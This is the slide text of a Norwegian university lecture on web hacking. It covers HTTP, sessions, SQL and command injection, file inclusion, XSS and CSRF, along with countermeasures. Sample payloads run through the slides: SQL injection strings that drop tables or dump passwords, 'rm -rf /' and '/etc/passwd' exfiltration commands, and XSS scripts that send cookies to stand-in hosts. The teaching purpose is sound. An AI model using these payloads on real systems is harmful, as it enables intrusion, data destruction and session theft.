Sikkerhet og Hacking. Forelesning 2 Hacking av nettsider. Tom Heine Nätt

Størrelse: px
Begynne med side:

Download "Sikkerhet og Hacking. Forelesning 2 Hacking av nettsider. Tom Heine Nätt"

Transkript

1 Sikkerhet og Hacking Forelesning 2 Hacking av nettsider Tom Heine Nätt

2 Dagens forelesning Viktigste er å forstå hva som går å gjøre, ikke hvordan Selv om hvordan er en bonus

3 Hva må en webhacker vite om webben?

4 Hva må en hacker vite om webben? Internet er ikke kun IRC, mail, FTP, Torrents osv.. De viktige spesifikasjonene: HTML (/CSS) JavaScript URL (/URI) HTTP(/HTTPS) PHP(/Python) Hvordan teknologien fungerer i detalj Hvordan manuelt utfører de operasjonene som programvaren vanligvis gjør

5 Kilder: RFC-dokumenter De fleste standarder for nettet Protokoller Fremgangsmåter Teknologier Osv.. Spesielt: F.eks: HTTP: URL:

6 Kilder: W3C World Wide Web Consortium HTML5: Javascript

7 Manualsider PHP: Python:

8 Webteknologier I kortform

9 HTML Websiders struktur Websiders innhold Aktive elementer (form-tags) Referanser til andre elementer Bilder, video, flash CSS JavaScript Osv Metatags: l

10 URL Uniform Resource Locator Forteller hvor en ressurs er Syntax: i/filnavn For eksempel: html ftp://www.site.example/ Schemes: http, https, gopher, ftp, news, mailto, telnet, file osv

11 URL forts. - Parametere Kan også inneholde parametere Legg til:?param1=verdi1&param2=verdi2 F.eks: a&rls=org.mozilla%3aen- US%3Aofficial&hs=vqd&q=hiof&btnG=S%C3%B8k& meta= URL encoding: Maskere ugyldige tegn i en url slik som: Space => %20 / =>%2F & => %26? => %3F Osv

12 HTTP Overføringsprotokollen Nettleseren er den aktive parten En tekst -protokoll (line oriented) To forespørsel -formater GET Data sendes gjennom URL POST Data sendes i forespørselspakken Regel: POST dersom det å laste siden har en Bi-effekt som f.eks registrering Ett svarformat RESPONSE Stateless (ikke forbindelsesorientert) Alt er separate forespørsler (f.eks alle bilder)

13 HTTP GET GET /index.html HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv: ) Gecko/ Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q =0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer:

14 HTTP POST POST /index.html HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-us; rv: ) Gecko/ Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q =0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: Content-Type: application/x-www-formurlencoded Content-Length: 25 usern=olan&passwd=drossap

15 HTTP - RESPONSE HTTP/1.x 200 OK Date: Wed, 28 Jan :40:30 GMT Server: Apache/2.2.3 (Debian) PHP/ etch13 Last-Modified: Sat, 24 Jan :02:05 GMT Etag: "581e8-2a8-f350d140" Accept-Ranges: bytes Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/html; charset=iso Content-Length: 680 <html> <head>.. </html>

16 Verktøy for manuell HTTP Telnet: telnet 80 GET /index.html HTTP/1.1 Host: MERK alle de underlige headerfeltene hos VG 301-svar GET /index.php HTTP/1.1 Host: Firefox: LiveHeaders

17 HTTP Interessante detaljer Referer (GET/POST) (Feilstavet ) Forteller hvor brukeren kommer i fra Google: søkeord i parameter Brukes ofte som en kontroll Dumt som vi skal se Sikkerhetshull (hvor kom du fra med hvilke parametere) Response-codes 200, 301, 404, 500

18 HTTPS Enkel forklaring: HTTP over en kryptert kanal Beskytter KUN overføringen av data/headers og mot man-in-the-middle attacks. Følgende skritt foretas: Server/Klient blir enige om krypteringsalgoritme Klienten validerer serverens sertifikat (Serveren validerer klienten) Gjøres (for) sjelden Blir enige om nøkkel

19 HTTPS-ulemper Brukeren! Gidder ikke bry seg om ugyldige sertifikater Vet ikke hva https-betyr, og kontrollerer det ikke Gir falsk trygghet Mot f.eks phishing-sider Er signeringen av sertifikatet riktig? Et system som er hacket

20 Domenenavn og IP-Adresser

21 Domenenavn og IP-adresser DNS-servere står for oversettelsen 1. Vi taster nettadresse 2. Maskinen kontakter sin oppgitte(!!!) DNS 3. DNS svarer med Ip-adresse / ping Hva om vi klarte å endre brukerens default DNS??? Rutere Windows/Mac/Linux Setting Både DHCP/manuell er farlig

22 Modifisere webforespørsler Proxyservere/FirefoxTamper

23 Proxyservere Brukes som oftest til delte cacher Alle forespørsler går gjennom proxyen Vi kan endre forespørslene før de går videre Forespørslene kan logges Typisk programvare PenProxy Startes: java -jar penproxy.jar 8088 Hva om vi setter opp en proxy i innstillingene til en annens maskin? Via virus, fake tutorials eller social engineering Eksempel: Skjult proxy (PenProxy)

24 Firefox Tamper Plugin til firefox Kan endre all headerinformasjon som sendes ut Eksempel

25 Cookies/Sessions

26 Cookies Informasjonskapseler Lagres på brukerens maskin (OBS!) Holder informasjon over flere sider /fra gang til gang Benyttes til: Hvilke annonser er sett Brukerinnstillinger på websider (farge, skriftstørrelse) Spore brukeren rundt på siden Handlekurver SessionID Osv I utgangspunktet kun samme webserver (OBS!) Om ikke path/domain er satt til noe annet Eksempel: Firefox View Cookies på

27 Cookies GET /index.html HTTP/1.1 Host: HTTP/ OK Content-type: text/html Set-Cookie: sessionid=aadd556ff GET /index2.html HTTP/1.1 Host: Cookie: sessionid=aadd556ff.

28 Cookie Set-Cookie finnes i mer avanserte former: Set-Cookie: sessionid=aadd556ff; expires=fri, 01-Jan :59:59 GMT; path=/; domain=.hiof.no HTTPOnly attributten path=/; domain=.hiof.no; HTTPOnly Hindrer f.eks Javascript uthenting

29 Sessions Kort fortalt: Serveren tildeler alle brukere en temporær ID Serveren lagrer data for en bruker med en viss ID ID en lagres som en cookie hos brukeren Hver forespørsel identifiseres av ID en som er lagret hos brukeren

30 Session hijacking Man tar over en annen brukers session ved å angi denne brukerens ID som sin egen.. Hvordan få ID? Snappe opp Proxyserver Pakkesniffing Referer-headeren Stjele Lese cookie-filene fra disk Cross Site scripting Gjette Om for eksempel id lages av brukernavn osv.. Eksempel: Bruktbutikk + Firefox Tamper

31 Session hijacking Firesheep:https://github.com/codebutler/firesheep/downloads Deprecated

32 Session hijacking - mottiltak Serveren husker brukers IP Problemer om IP endres ofte Ha en ekstra kontroll på f.eks User- Agent Hvor lenge skal sesjonene være åpne? Blir sesjons-id en generert random, eller basert på brukerinfo osv? Tvinge HTTPS

33 Hvorfor er nettet så sårbart? Hva tror dere?

34 Hvorfor er nettet så sårbart? Gammel teknologi Nye bruksområder Nye brukere Alt flyttes over på web Tjenester Personlig data Applikasjoner Mange hobbyprogrammerere Finner eksempelkode som ikke fokuserer på sikkerhet, men enkelhet Fornøyd når det funker Alle har tilgang Få forstår det som ligger bak Klarer ikke jeg, klarer ikke andre Sikkerhet er en merkostnad i utvikling

35 Hvorfor er nettet sårbart? Feiler en webserver, kan den risikere å vise koden Mange kjente feller å gå i Include Opplastning gjestebok Osv.. Glemmer å skille på client-side(usikker) og server-side(sikker) Alt nettleseren kan gjøre, kan man også gjøre manuelt (med endringer)

36 Hvorfor er nettet så sårbart Masse teite ideer for publisering Løpende artikkelnummer Lett å skrape informasjon Gjettbare URL er medlems-sider gjennom å f.eks slenge på /member Brukerspesifike løsninger =534534

37 Brukerinput

38 Brukerinput Whitelisting vs. Blacklisting Hvor havner de tegnene vi ikke har tenkt på Whitelisting: lett å glemme noe som burde vært lov (JFR: Nätt) Blacklisting: mer arbeid på forhånd, samt blir sjelden oppdatert raskt nok med nye farer som oppdages Hva er best? Usergenerated (inputfelter osv.) og servergenerated (cookies, headerfield osv.) Manipulasjon av servergenerated er helt klart hacking Ikke gi noen feilmelding osv for disse (kun hendelsen er logget ) Ikke gjør brukerens input gyldig, dersom den inneholder feil

39 Brukerinput Validering Mangel på validering som gir hackere muligheter Teknologier som regexp hindre mye F.eks vil da aldri telefonnummer forårsake SQL-injections Husk at input er mer enn tekst Coockies Hidden fields Metadata i requests osv.. Mange former for validering Tegn Verdier (domain) Lengde (smart triks..) Gjør inputkontrollen FØRST! NB! Client-side validering!!! Greit for feilmeldinger, men ikke som sperre.

40 Eksempler på gal input Bestille negativt antall varer Fradato før tildato Osv

41 Data til undersystemer Stringer som sendes mellom systemer Tolkes som noe annet enn tekst i ett av systemene Fra bokstaver til kontrolltegn/metadata Problemet er når brukeren kan manipulere disse strengene

42 Data til undersystemer Flere teknikker Parametermanipulasjon SQL-injections Command-inejctions Cross-site scripting Osv..

43 Parametermanipulasjon

44 Parametermanipulasjon GET-request mellom sider Ofte uskyldige data i utgangspuntket Vi kan gå inn å endre parameterne i URL en Mange sider leser kun REQUEST Altså skiller ikke på POST og GET Kan benyttes til: Lure andre Lure systemet

45 Parametermanipulasjon: Google hl=no&q=hiof&btng=googles%c3%b8k&meta=&aq=f&oq= hl-verdier: fr en xx-elmer xx-klingon osv..

46 Parametermanipulasjon: SA-været longitude=11.11&latitude=59.28&moh=50

47 Parametermanipulasjon Andre eksempler Hiofs-publiseringssystem Canadiske passsystemet Guinness Alle former for overføring av info mellom sider Registreringsystem Nettbutikker Popupvinduer

48 SQL-Injection

49 SQL-Injections Problemet: SQL er tekststrenger i programmering Bygges sammen, og sendes til DB.. Tenk: INSERT INTO Test VALUES( Per ); INSERT INTO Test VALUES( Per s bakeri );

50 Typisk Kode <?php $fornavn=$_get["fornavn"]; $etternavn=$_get["etternavn"]; $sql = "INSERT INTO Test VALUES('".$fornavn."','".$etternavn."')"; mysql_query($sql,$con);?>

51 SQL-Injection Eksempel 1 Turid SELECT kolonne FROM tabell WHERE kolonne2=' '; '; DELETE FROM tabell WHERE kolonne2!= ' sokesql.php

52 SQL-Injection Eksempel 2 per test SELECT * FROM user WHERE username= ' AND password=' '; per -- ' OR ''=' per OR 1 = 2 Altså En setning to svakhter (Husk AND har høyere presedens enn OR) loginsql.php

53 SQL-Injection Eksempel 3 45 SELECT * FROM Bruker WHERE ID = 45; DROP TABLE Bruker

54 SQL-Injection Eksempel 4 SELECT id, produktnavn, pris FROM Produkt WHERE ID = UNION SELECT 0, brukernavn, passord FROM Login Typisk: $_GET[ varenummer ]

55 SQL-Injection Eksempel 5 SELECT id, produktnavn, pris FROM Produkt WHERE ID = 45 45; UPDATE Produkt SET produktnavn = (SELECT passord FROM Kunde WHERE brukernavn= olehansen ) WHERE id=45

56 SQL-Injection Eksempel 6 SELECT id, produktnavn, pris FROM Produkt WHERE ID = 45 45; SHUTDOWN

57 SQL-Injection Vi kan også benytte tegnkoder for databasen Overses ofte av filtreringer i programmeringsspråket F.eks: Char(39) => ' 0x27 => '

58 SQL-Injections Hvordan kjenne strukturen på spørringen Gjettinger/resonement Fremprovosere feilmeldinger F.eks: ugyldige injection -forsøk Om man er heldig vises hele kodelinja med SELECT-setningen HAVING/GROUP BY trikset Vil avsløre kolonnenavn Brute Force Få tak i kildekoden

59 SQL-Injections Hvordan forhindre: Benytte lagrede prosedyrer Sende variabler(med typer), istedenfor tekst til DB Prepared statements SELECT * FROM Kunde WHERE name=? Escape farlige tegn F.eks ' blir til \' eller '' Blacklisting vs. Whitelisting Sette rettigheter Ingen av disse er 100% sikre Alle prog. språk/db har sine feil Fort gjort å stole helt på dette

60

61 Sikkerhet og DB Vær ytterst forsiktig med å ha db-brukerinfo i kildekoden Andre autentiseringskilder Bruke data fra innlogging Sertifikater Tjenesteserver Skjulte "inc-filer" utenfor htdocs.. La mest mulig av prosesseringen foregå i DBMS Prosedyrer SQL-prosessering (hent ut minst mulig data ) Pass på serverscript... Kan komme i gale hender ved serverfeil.. Unngå "sqlzoo.net"-bokser Utfør aldri DB-administrative oppgaver direkte fra applikasjon Skjul mest mulig spor av db i feilmeldinger og resultater

62 Command Injection

63 Command Injection Tilsvarende som SQL-Injection, men at vi kjører systemkommandoer i webscriptene F.eks: *.txt echo `ls `; *.txt; rm rf /

64 Command Injection 10 echo `cal `; 10; sendmail < /etc/passwd; 10; cat adjø > /var/log/apache2/access_log

65 Filopplasting

66 Filopplasting Om filene senere presenteres på websiden.. Hva med: Å laste opp minfil.php (minfil.php%00.jpg) Eksempel: filopplasting.html

67 Inkludering av filer

68 Inkludering av filer Typisk: index.php?side=test.php index.php?side=/etc/passwd Fare for at brukeren kan få Se systemfiler Se programkoden Uendelig mange måter å lure slike script på om man ikke har en whitelist-chek F.eks %00-tegnet eller \0 (null-byte) Eksempel: include1.php, include2.php, include3.php

69 Cross-site scripting (XSS)

70 XSS-eksempel guestbook.php/artikel.php

71 Cross-site scripting (XSS) Baserer seg på websider der bruker skriver inn data, som senere presenteres på en webside Gjestebøker Blogger (kommentarfelt) Annonsemarked Nettleksikon Mer riktig definisjon: Lure en webside til å vise utvalgte HTML-koder Evt URL-parametere Baserer seg på at (HTML/)JavaScript er tekst Og alt for mange måter å skrive JS-kode på

72 XSS Benyttes til Vise uheldig data Endre data som vises Stjele cookies fra brukerne Session hijacking Utnytte sikkerhetshull i nettlesere Endre hvor forms sender data Osv

73 XSS Vanlig kode <!-- (skjuler resten av innleggene osv) <script>window.open( ) </script> Legg til: for(i=0;i<1000;i++) <script>document.location.replace( url )</script> <script>document.body.innerhtml.replace( noe, noe annet )</script> F.eks kontonummeret på siden til et firma

74 XSS Hvordan skjule <script src=http://www.hacker.example/script.js> ><script> </script><q q= Dersom: <input type= text value= > <sc<script>ript>.</sc</script>ript> Dersom noen filtrerer for <script> +ADW-script+AD4- +ADW-/script+AD4- Ascii/unicode fare Viktig å angi tegnsette i meta-taggen Se for flere/andre..

75 XSS Session hijacking document.location.replace( om/test.php?info= + document.cookie); Eksempel: bruktmarked Her kan man redirecte tilbake igjen til riktig side, samt sette en cookie som gjør at man ikke blir redirected i en uendelig løkke Hva om vi gjør dette i en IFrame?

76 XSS Session hijacking <script type="text/javascript"> if(document.cookie.indexof("abc")< 0) { document.cookie = "abc=1"; document.location.replace("http://www.blablabla. com/steal.php?id="+document.cookie+"&ref="+docum ent.location); } </script>

77 Måter å skrive JavaScript på <script> </script> <a href= javascript: > Også for <img src= > <body onload= > onclick, ondbclick,onmousedown, onkeypress osv.. + mange flere browserpesifike

78 XSS og URL -parametere Dersom en url-parameter vises på en webside. Tom%20Heine<script>osv..</script> Krever at vi lurer brukeren å gå inn på den bestemte URL en.. Eksempel: greeting.php F.eks endre søkeresultater i et telefonkatalogoppslag

79 XSS og Mail Alle nyere web-mailklienter leser HTML-mail Og er derfor utsatt for XSS

80 XSS - mottiltak Filtrere bort alle farlige tegn (html encoding/entities): & => & => " < => < > => > => &#39; Uansett nyttig.. Ikke bare for XSS tenk brukerinput med f.eks: > Filtrere bort enkelte tagger Omtrent umulig å få riktig/tenke på alle muligheter Uendelig mange variasjoner på skrivemåter nettelsere er for snille Benytte ferdige editorer som gjør jobben Benytte funksjone ri prog-språk: f.eks htmlentities, mysql_real_escape_string Skru av JS i nettleser umulig løsning Kan være en idee å også filtrere under output For å være sikker på å få med alt Etter prossesering

81 Manipulasjon av websider FireBug

82 Firebug Legge til valg i lister Fjerne/disable Javascript kontroller Legge til/endre hidden -felter

83 Firebug-eksempler/server generert data F.eks kontooversikt... <form action= vis.php metohd= get > Konto: <select name= konto > <option value= >Konto 1</option> <option value= >Konto 2</option> </select> </form> Eksempel: regskjema.php

84 Logging

85 Logging Alt man gjør logges Ofte usikkerhetsmomentet ved et angrep Er den angrepnes beste Bevis Metode for å tette hull Metode for å oppdage angrepet MEN: Får man tilgang til loggfilene, kan de bli nyttig verktøy Prøve noe, se på resultat

86 DoS-angrep

87 DoS angrep For mange forespørsler For mye data F.eks laste opp kjempefil Forespørsler som setter i gang kompliserte operasjoner ugyldige verdier Utnytte feil i programkode Evige løkker Forespørsler som er umulige å skille fra ekte

88 Web-Trojaner

89 Web-Trojaner Også kjent som CSRF /XSRF Cross-site request forgery Lure noen inn på en webside ( med visse parametere satt) spoofing, XSS, Phishing osv. Spesielt nyttig når en bruker alt er innlogget på en tjeneste Evt. En remember me -sak Eksempler på bruk: Lure til kjøp av aksjer NHY.OL &amount=40000&pric e=100 Lure noen til å legge deg til som facebookvenn (ikke autentisk) Poste på din facebook-side er en gjøk (ikke autentisk) Linkene kan også se vennlige ut, men med redirect Et nytt kjempeproblem!

90 Web-Trojaner - Hvordan Via GET-URL Kan være en normal URL med redirect til f.eks Via Autopost-form-sider (POST) <form name= test action= method= post > <input type= hidden name= param value= > </form> <script> document.getelementbyid( test ).submit()</script>

91 Web-Trojanere - Løsninger Eksempel: autopost.html/ kulside.html Eksempel: CSRF-hiof (web/index.php) Mottiltak: Bekreftelse med passord/passordkalkulatorer Captchas Ticket/FormID-løsninger Men: Frame-løsninger (en for virkelige siden, en med fakesiden og samme id)

92 Flash-animasjoner

93 Flashanimasjoner Flash-animasjoner kaller ofte skjulte URL er med artige parametere Annen type programmerere Tenker at dette er jo hemmelig fordi binært Highscore: sethighscore.php?name=thn&score=5600 Mottiltak Generere med en hemmelig sjekksum/passord basert på navn/score sethighscore.php?name=thn&score=5600&check=ae343 2DDF32 Julekalender: f.no&luke=14 Finner format ved wiretapping

94 Automatisk skraping

95 Automatisk skraping Man kan lett tømme en website for informasjon via programvare som skraper all data Eksempel: vgnet.php Eksempel: Tele2-saken

96 Finne skjulte data Robots.txt Disallow Nummererte artikler Google-søk med site:

97 Bakveien

98 Bakveien De aller fleste websider kan nåes via FTP og SSH FTP (ikke SFTP) sender passord i klartekst Kommer vi inn her, kan vi både se og modifisere kode

99 Andre triks

100 Andre triks Rekkefølge som f.eks REQUEST søker i Hva om GET før POST? PHP sin autovariabelmapping Eksempel: register_globals.php Kun om server er satt opp rart Ikke på hiof

101 Andre triks Link-CSS JS: getcomputedstyle() <= Avslører history Se etter kommentarer i HTMLkildekoden Mange kommenterer f.eks PHP med <!- -og -->

102 Andre triks - hidden-feltet Inputvalidering på første side så hidden-felter på videre sider Data er innom brukeren flere ganger, men valideres ofte bare første gang Typisk: Bestillingssider Edit-sider ID som skal oppdateres er et hidden field..

103 Andre triks God samleside med Firefox-utvidelser for hackere Web+Application+Assault+Kit Lost password Sender passord i klartekst via mail Passordinnlogging: DoS-angrep: Bruk opp alle 3 forsøk på alle brukere Alt for mange sider autentiserer bare tilgang på form en, og ikke det som sendes inn Vi kan derfor lage vår egen form og sende inn data uten å egentlig ha tilgang, om vi vet hvordan formen ser ut

104 Andre triks GET-URL er som er sendt over HTTP er synlig i Historikken Logger Routere ISP Wiretapping Osv.. Obs: Hemmelig data i GET-requests (f.eks session ID) Synelig som Referer-metadata på neste side.. OBS!!!! Derfor: Aldri gå fra en sikker til en usikker side direkte!

105 Andre triks Mange benytter encoding som encryption.. F.eks BASE64, ROT13 Sikker side, som sender opplysningene til deg som mail etterpå Websider viser ofte ukjente filformater som tekst Sikkerhetshull i Webserverne

106 CMS-systemer

107 CMS-systemer Baserer seg på?id=4844 prinsippet Mye brukt = kjente exploits Standardkontoer Hackingangrep = bakdører 3.parts plugins

108 Sikker kode

109 Hvordan skrive sikker kode Ikke tro at ingen kan hacke, fordi det bak er skjult F.eks tabellnavn, filstruktur osv Aldri dupliser kode Benytt funksjoner Isoler funksjonalitet Benytt funksjoner Skriv forstårlig/enkel kode Benytt funksjoner Kommenter kode Eller skriv selvforklarende kode Lær deg programmeringsspråkets særegenheter.. Vær flink til å logge hendelser med mye info

110 Til neste gang (18/2) Prosjekt 2 Les Art of Deception -boka Samle på SPAM

User Input / Output Handling. Innocent Code kap 3-4 INF-329 Øystein Lervik Larsen oysteinl@ii.uib.no 7/11-05

User Input / Output Handling. Innocent Code kap 3-4 INF-329 Øystein Lervik Larsen oysteinl@ii.uib.no 7/11-05 User Input / Output Handling Innocent Code kap 3-4 INF-329 Øystein Lervik Larsen oysteinl@ii.uib.no 7/11-05 Oversikt Bruker-input (kap. 3) Hva er input? Validering av input Behandle ugyldig input Farer

Detaljer

Innocent Code Kapittel 1: The Basics Kapittel 2: Passing Data to Subsystems

Innocent Code Kapittel 1: The Basics Kapittel 2: Passing Data to Subsystems Innocent Code Kapittel 1: The Basics Kapittel 2: Passing Data to Subsystems INF329, høsten 2005 Utvikling av sikre applikasjoner Martin Lie martin@mq.no 2005-11-02 Kapittel 1: The Basics HTTP Sesjoner

Detaljer

Agenda. Data og grenser Kontekster XSS XSS og kompliserende kontekster Injection attacks Beskyttelse OWASP

Agenda. Data og grenser Kontekster XSS XSS og kompliserende kontekster Injection attacks Beskyttelse OWASP Når data krysser grenser Erlend Oftedal, BEKK Knut Vidar Siem, Objectware Communities in Action 10. mai 2010 Copyright The OWASP Foundation Permission is granted to copy, distribute and/or modify this

Detaljer

Nettsikkerhet. Tom Heine Nätt Høgskolelektor Høgskolen i Østfold tom.h.natt@hiof.no

Nettsikkerhet. Tom Heine Nätt Høgskolelektor Høgskolen i Østfold tom.h.natt@hiof.no Nettsikkerhet Tom Heine Nätt Høgskolelektor Høgskolen i Østfold tom.h.natt@hiof.no Plan Introduksjon Ulike teknikker Social Engineering Digitale fotavtrykk Identitetstyveri Introduksjon Flere brukere +

Detaljer

Oblig 5 Webutvikling. Av Thomas Gitlevaag

Oblig 5 Webutvikling. Av Thomas Gitlevaag Oblig 5 Webutvikling Av Thomas Gitlevaag For oppgave 1 og 2 skal dere levere en funksjonell webside på deres hjemmeområde. Dere skal også levere alle phps-filene slik at man for en hver side kan slenge

Detaljer

Pen- tes'ng av webservices. Asbjørn Reglund Thorsen Gruppe- og utviklingsleder UIO/FSAT TwiDer: @fuzzerman

Pen- tes'ng av webservices. Asbjørn Reglund Thorsen Gruppe- og utviklingsleder UIO/FSAT TwiDer: @fuzzerman Pen- tes'ng av webservices Asbjørn Reglund Thorsen Gruppe- og utviklingsleder UIO/FSAT TwiDer: @fuzzerman Om meg Gruppe- og utviklingsleder på FSAT Felles studieadministra'vt tjenestesenter Sikkerhetsekspert

Detaljer

Erlend Oftedal. Risiko og sikkerhet i IKT-systemer, Tekna

Erlend Oftedal. Risiko og sikkerhet i IKT-systemer, Tekna Sikkerhet i Web 2.0 Erlend Oftedal Risiko og sikkerhet i IKT-systemer, Tekna Hva er spesielt med Web 2.0? Innhold fra flere kilder Sosiale nettsteder med brukergenerert innhold Mashups gjerne med innhold

Detaljer

Sikkerhet og internett. Kan vi være vi trygge? Kan vi beskytte oss? Bør vi slå av nettet

Sikkerhet og internett. Kan vi være vi trygge? Kan vi beskytte oss? Bør vi slå av nettet Sikkerhet og internett Kan vi være vi trygge? Kan vi beskytte oss? Bør vi slå av nettet Stoler du på denne mannen? 28.01.2009 Om sikkerhet på Internettet ved Hans Nordhaug 2 Jepp Derfor fant du i januar

Detaljer

Sikkerhet og internett

Sikkerhet og internett Sikkerhet og internett Kan vi være vi trygge? Kan vi beskytte oss? Bør vi slå av nettet Stoler du på denne mannen? 25.01.2008 Om sikkerhet på Internettet ved Hans Nordhaug 2 1 Nei? Og likevel er du på

Detaljer

Prosjekt 3 i sikkerhet og hacking

Prosjekt 3 i sikkerhet og hacking Prosjekt 3 i sikkerhet og hacking Social engineering svindel For: Jonas Bro, Lars Petter Bjørkevoll, Audun Hodnefjell og Magnus Skaalsveen 1 Innledning DISCLAIMER Svindelen som er beskrevet i denne oppgaven

Detaljer

1. Koble opp mot tjener 2. Send forespørsel. 3. Send respons 4. Lukk forbindelsen. Klient Tjener

1. Koble opp mot tjener 2. Send forespørsel. 3. Send respons 4. Lukk forbindelsen. Klient Tjener Web sikkerhet Klient/tjener 1. Koble opp mot tjener 2. Send forespørsel 3. Send respons 4. Lukk forbindelsen Klient Tjener HTTP GET GET http://kark.hin.no:80/internett/javascript/ajax/test.html HTTP/1.1

Detaljer

som blanker skjermen (clear screen). Du får en oversikt over alle kommandoene ved å skrive,

som blanker skjermen (clear screen). Du får en oversikt over alle kommandoene ved å skrive, 1. Last ned og installer XAMPP. 2. Sjekk at alt fungerer. 3. MySQL. Vi begynner med databaseserveren, MySQL. Gå til DOS klarmelding eller ledetekst (finnes under tilbehør på startmenyen om du ikke som

Detaljer

Tilkobling og Triggere

Tilkobling og Triggere Tilkobling og Triggere Lars Vidar Magnusson October 12, 2011 Lars Vidar Magnusson () Forelesning i DAS 11.10.2011 October 12, 2011 1 / 25 Tilkobling med PHP PHP bruker databasespesifike moduler til å koble

Detaljer

Innhold. Innledning... 13

Innhold. Innledning... 13 Innhold Innledning.................................................... 13 Kapittel 1 Kom i gang med PHP............................................ 17 1.1 Hvorfor PHP?.............................................

Detaljer

HTML5. Skjemaer på nettsider. Skjemaer med. Informasjonsteknologi 1 og 2. Gløer Olav Langslet Sandvika VGS

HTML5. Skjemaer på nettsider. Skjemaer med. Informasjonsteknologi 1 og 2. Gløer Olav Langslet Sandvika VGS Skjemaer med HTML5 Gløer Olav Langslet Sandvika VGS Leksjon 10 Informasjonsteknologi 1 og 2 Skjemaer på nettsider I denne leksjonen skal vi se litt nærmere på bruk av skjemaer på nettsider. Du har sett

Detaljer

file:///c:/users/michaelp/sites/dkdm/dw6/dreamweaver6.html

file:///c:/users/michaelp/sites/dkdm/dw6/dreamweaver6.html 1 of 9 15.04.2015 14:15 Spry og behaviours Både Spry and Behaviours er basert på programmeringsspråket Javascript. Javascript kjører i nettleseren og ikke på webserver som PHP og Perl. På en lignende måte

Detaljer

Eksamen i Internetteknologi Fagkode: IVA1379

Eksamen i Internetteknologi Fagkode: IVA1379 Høgskolen i Narvik Side 1 av 5 Eksamen i Internetteknologi Fagkode: IVA1379 Tid: Mandag, 07.06.04, 9:00-12:00 Tillatte hjelpemidler: Alle trykte og skrevne hjelpemidler tillatt. Eksamen består av 4 oppgaver

Detaljer

Båtforening på nett. Produktrapport

Båtforening på nett. Produktrapport Båtforening på nett Hovedprosjekt våren 2009, Høgskolen i Oslo Prosjektgruppe 36 Vegard Skipnes, Rade Vuckovic & Frode Sørensen Produktrapport 1 Sammendrag Denne rapporten er en del av Hovedprosjektet

Detaljer

Problem med innlogging til Sauekontrollen Web?

Problem med innlogging til Sauekontrollen Web? Problem med innlogging til Sauekontrollen Web? Riktig nettleser? Husk at det er kun Internet Explorer av nettlesere som kan brukes (ikke for eksempel Opera, Mozilla Firefox, Safari). Riktig brukernavn

Detaljer

Løsningsforslag til eksamen 24. november 2015

Løsningsforslag til eksamen 24. november 2015 Operativsystemer med Linux Løsningsforslag til eksamen 24. november 2015 Oppgave 1 a) Et OS deler tiden inn i små deler, typisk et hundredels sekund, og fordeler slike korte timeslices til alle prossene

Detaljer

Dette er en demonstrasjonsside som vi skal bruke for å se litt nærmere på HTTP protokollen. Eksemplet vil også illustrere et par ting i PHP.

Dette er en demonstrasjonsside som vi skal bruke for å se litt nærmere på HTTP protokollen. Eksemplet vil også illustrere et par ting i PHP. 1 Dette er en demonstrasjonsside som vi skal bruke for å se litt nærmere på HTTP protokollen. Eksemplet vil også illustrere et par ting i PHP. (Læreboka kapittel 2-5) Legg merke til den første blokken,

Detaljer

Intro til WWW, HTML5 og CSS

Intro til WWW, HTML5 og CSS Intro til WWW, HTML5 og CSS Håkon Tolsby 20.08.2015 Håkon Tolsby 1 World Wide Web Webserver: Programvare som distribuerer websider og/eller maskin hvor programmet kjører Webbrowser (nettleser): Program

Detaljer

Kap 3: Anvendelser av Internett

Kap 3: Anvendelser av Internett Kap 3: Anvendelser av Internett Hva er egentlig Internett? Skal studere de vanligste protokollene: Web E-post DNS Ansvarsområder og prosess-skille 1 Hva er egentlig Internett? Infrastruktur Tjenester Roller

Detaljer

Målrettede angrep. CIO forum 6.mars 2013. Tore Terjesen Head of MSS & SOCs - Nordics tore.terjesen@secode.com

Målrettede angrep. CIO forum 6.mars 2013. Tore Terjesen Head of MSS & SOCs - Nordics tore.terjesen@secode.com Målrettede angrep CIO forum 6.mars 2013 Tore Terjesen Head of MSS & SOCs - Nordics tore.terjesen@secode.com Secode the pure play security company En ledende og relevant MSSP i Norden Malware research team

Detaljer

Database security. Kapittel 14 Building Secure Software. Inf329, Høst 2005 Isabel Maldonado st10900@student.uib.no

Database security. Kapittel 14 Building Secure Software. Inf329, Høst 2005 Isabel Maldonado st10900@student.uib.no Database security Kapittel 14 Building Secure Software Inf329, Høst 2005 Isabel Maldonado st10900@student.uib.no Kort introduksjon Database er en organisert samling av data. SQL(Structured Query Language)

Detaljer

Et forsøk på definisjon. Eksempel 1

Et forsøk på definisjon. Eksempel 1 Et forsøk på definisjon [Kurssidene] [ ABI - fagsider bibin ] Michael Preminger (michael.preminger@hioa.no) 19/08-15 Engelsklignende språk, med rigid syntaks, som kan brukes til å skrive instruksjoner

Detaljer

LAB-L SETTE OPP MICROSOFT SERVER 2003

LAB-L SETTE OPP MICROSOFT SERVER 2003 Av Erik Espenakk JEG BEGYNNER MED EN FRISK INSTALLASJON AV WINDOWS SERVER. Her kan du legge til diverse server applikasjoner. Legg til DNS og Applikasjons server Her har jeg satt opp en Application server

Detaljer

Effektiv Systemadministrasjon

Effektiv Systemadministrasjon Effektiv Systemadministrasjon UBW MILESTONE WILLIAM NILSEN Introduksjon William Nilsen ASP/Cloud avdelingen i Evry Jobbet flere år med generelt teknisk drift og ca 3 år med drift av UBW ASP/Cloud avdelingen

Detaljer

Innstallasjon og oppsett av Wordpress

Innstallasjon og oppsett av Wordpress Del 1 - Installasjon og oppsett Innstallasjon og oppsett av Wordpress Wordpress har blitt en veldig populær publiseringsplattform for websider. Uten særlige tekniske ferdigheter kan man sette opp profesjonelle

Detaljer

Bruker dokumentasjon Web sikkerhet. Universitet i Stavanger

